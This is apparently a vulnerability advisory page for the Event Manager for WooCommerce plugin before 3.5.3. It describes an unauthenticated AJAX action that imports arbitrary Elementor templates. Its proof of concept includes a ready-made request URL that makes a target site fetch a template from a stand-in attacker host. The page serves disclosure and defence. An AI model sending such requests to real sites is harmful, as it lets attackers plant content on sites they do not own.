Event Manager for WooCommerce < 3.5.3 – Unauthenticated Arbitrary Elementor Template Import | Plugin Vulnerabilities

Description

The mep_import_ajax_template AJAX action of the plugin, available to both unauthenticated and authenticated users, is lacking any authorisation and CSRF checks. As a result, unauthenticated user can import arbitrary Elementor template to the blog

Proof of Concept

Legit template: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&file=https%3A%2F%2Fvaincode.com%2Fupdate%2Ftemplate%2Fjson%2Fpadma.json&editor=elm&name=Elementor+Template+-+Padma

Attacker one: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&editor=elm&name=attacker&file=https://attacker.com/template.json

Affects Plugins

mage-eventpress

Fixed in 3.5.3

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

85387986-5479-4575-8740-dff59866f9c6

Timeline

Publicly Published

2021-11-03 (about 4 years ago)

Added

2021-11-03 (about 4 years ago)

Last Updated

2021-11-03 (about 4 years ago)

Other

Published

Title

Published

2018-12-04

Title

JobCareer < 2.4.1 - User enumeration & Reset password

Published

2020-08-21

Title

Contact Form - Form builder by Kali Forms < 2.1.2 - Authenticated Plugin's Settings Change

Published

2024-07-31

Title

Breakdance < 2.0.0 - Missing Authorization

Published

2021-08-18

Title

Visual Link Preview < 2.2.3 - Unauthorised AJAX Calls

Published

2021-11-01

Title

Contest Gallery < 13.1.0.6 - Missing Access Controls to Unauthenticated SQL injection / Email Address Disclosure